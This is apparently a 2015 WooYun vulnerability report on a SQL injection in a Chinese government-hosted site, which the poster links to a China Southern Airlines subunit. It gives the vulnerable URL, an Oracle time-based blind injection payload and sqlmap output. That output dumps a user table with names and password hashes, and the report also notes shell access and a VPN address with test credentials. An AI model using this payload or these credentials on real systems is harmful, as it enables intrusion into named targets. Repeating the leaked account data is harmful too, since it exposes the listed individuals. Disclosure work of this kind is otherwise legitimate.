当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155130

漏洞标题:南航某子单位网站SQL注入(vpn/办公/航护/公文等系统)

相关厂商:中国南方航空股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-23 09:43

修复时间:2015-11-23 09:58

公开时间:2015-11-23 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.xnslfh.gov.cn/swweb/search.asp?ModuleName=%EF%BF%BD%EF%BF%BD%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD publish_day=30&keyword=88952634 存在POST sql注入漏洞

11.png


sqlmap identified the following injection points with a total of 322 HTTP(s) requests:
---
Parameter: keyword (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: publish_day=30&keyword=88952634%' AND 7563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(113)||CHR(121)||CHR(70),5) AND '%'='
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Oracle
available databases [11]:
[*] CTXSYS
[*] MDSYS
[*] ORDSYS
[*] OUTLN
[*] SWINFO
[*] SWWEB
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB


+---------+---------+------------+---------------+-----------+-----------+------------+----------------------------------+
| USER_ID | RAND_ID | GRADING_ID | DEPARTMENT_ID | WORK_FLAG | USER_NAME | USER_ORDER | USER_PASSWORD |
+---------+---------+------------+---------------+-----------+-----------+------------+----------------------------------+
| admin | 20 | 13 | admin" | 是 | 系统管理员 | 1 | 48c13864cee707ab05033031b4b5e88a |
| lj1 | 20 | 13 | ltx | 是 | 林 静 | 28 | 28debd8473f4d3f5081c8d8c4def1378 |
| zgl1 | 50 | 13 | BSHHZ | 张高林 | 11 | 59ae7951c451c7b4fb608d818f762886 |
+---------+---------+------------+---------------+-----------+-----------+------------+----------------------------------+


数据跑得太慢了
可执行sql-shell
另一处VPN https://222.221.250.22/por/login_psw.csp?
test test

22222.png


33.png


放了好久了 不想搞,延迟太慢了

漏洞证明:

22222.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-23 09:58

厂商回复:

您好,此网站不属于南方航空公司所有。

最新状态:

暂无